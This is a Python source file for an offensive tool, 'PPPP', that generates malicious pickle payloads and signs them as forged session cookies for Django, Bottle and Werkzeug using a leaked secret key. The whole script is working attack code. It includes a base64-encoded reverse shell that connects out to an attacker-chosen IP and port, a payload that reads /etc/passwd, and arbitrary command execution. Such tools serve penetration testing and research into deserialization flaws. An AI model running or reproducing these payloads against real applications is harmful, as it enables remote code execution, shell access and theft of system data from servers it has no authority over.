#!/usr/bin/env python

#PPPP, the Python Problematic Pickle Printer
#Copyright (C) 2013 Nicolas "Balda" Oberli
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

import os, base64, pickle, pickletools, hashlib, argparse, hmac, time
from baseconv import base62    # Stolen from Django itself, booo

def gen_django_file(payload, varname, secret, salt='django.contrib.sessionsSessionStore'):
    value = "(dp0\nS'"+varname+"'\np1\n"+payload+"p2\ns."
    key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
    mac = hmac.new(key, value, digestmod=hashlib.sha1)
    return base64.b64encode(mac.hexdigest()+':'+value)

def gen_django_payload(payload, varname, secret, timestamp=None, salt='django.contrib.sessions.backends.signed_cookiessigner'):
    """
    Takes an already pickled code and creates a valid cookie for Django
    """
    if timestamp is None:
        timestamp = base62.encode(int(time.time()))
    value = base64.b64encode("(dp0\nS'"+varname+"'\np1\n"+payload+"p2\ns.").strip('=')
    value = value +':'+timestamp
    key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
    mac = hmac.new(key, value, digestmod=hashlib.sha1)
    return value + ':'+base64.b64encode(mac.digest()).strip('=')

def gen_bottle_payload(payload, varname, secret):
    """
    Takes an already pickled code and creates a valid cookie for Bottle
    """
    value = "(S'"+varname+"'\n"+payload+"t."
    msg = base64.b64encode(value)
    sig = base64.b64encode(hmac.new(secret, msg).digest())
    return "!"+sig+"?"+msg

def gen_werkzeug_payload(payload, varname, secret, hashtype='sha1'):
    """
    Takes an alrealy pickled code and creates a valid cookie for Werkzeug
    """
    mac=hmac.new(secret, None, hashlib.sha1)
    result = [varname+'='+base64.b64encode(payload)]
    mac.update('|' + result[-1])
    return mac.digest().encode('base64').strip()+"?"+'&'.join(result)

def gen_connect_back(ip="127.0.0.1", port=31337, shell="/bin/sh"):
    """
    Generates a connect back shell with IP and port
    """
    connect_back="import socket,os,subprocess;s=socket.socket(2);s.connect(('"+ip+"',"+port+"));subprocess.call(['"+shell+"'],shell=True,stdin=s,stdout=s)"
    encoded = base64.b64encode('eval(compile("%s", "q", "exec"))' % connect_back)
    payload = ("c__builtin__\neval\n(cbase64\nb64decode\n(S'"+encoded+"'\ntRtR")
    return payload

def gen_read_file(filename="/etc/passwd"):
    """
    Generates a file read payload
    """
    payload = "csubprocess\ncheck_output\n((S'cat'\nS'"+filename+"'\nltR"
    return payload

def gen_command(command):
    """
    Generates a command execution payload
    """
    command=command.replace(" ","'\nS'")
    payload = "csubprocess\ncheck_output\n((S'"+command+"'\nltR"
    return payload

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Generates harmful pickles for various uses (and fun)")
    parser.add_argument('-o', '--output', dest='output', choices=['django_cookie','django_file','werkzeug','bottle', 'raw'], default='raw', help="Pickle output format")
    parser.add_argument('-k', '--key',dest='secret_key', help="Application's secret key")
    parser.add_argument('-p', '--payload', dest='payload',  choices=['connect_back','read_file','command_exec'],help="Payload type", required=True)
    parser.add_argument('-a', '--argument', dest='argument', help="Payload's argument", required=True)
    parser.add_argument('-n', '--name', dest='var_name', help="Var name for the pickled payload")
    parser.add_argument('-m', '--mac', dest='hash_type', default='sha1', help="(Werkzeug only) specify the hash type")

    args = parser.parse_args()

    if args.payload == 'connect_back':
        client=args.argument.split(':')
        payload = gen_connect_back(ip=client[0], port=client[1])
    elif args.payload == 'read_file':
        payload = gen_read_file(filename=args.argument)
    elif args.payload == 'command_exec':
        payload = gen_command(command=args.argument)

    if args.output == 'raw':
        output = repr(payload+'.')
    elif args.output == 'bottle':
        output = gen_bottle_payload(payload, varname=args.var_name, secret=args.secret_key)
    elif args.output == 'werkzeug':
        output = gen_werkzeug_payload(payload, varname=args.var_name, secret=args.secret_key)
    elif args.output == 'django_cookie':
        output = gen_django_payload(payload, varname=args.var_name, secret=args.secret_key)
    elif args.output == 'django_file':
        output = gen_django_file(payload, varname=args.var_name, secret=args.secret_key)


    print(output)
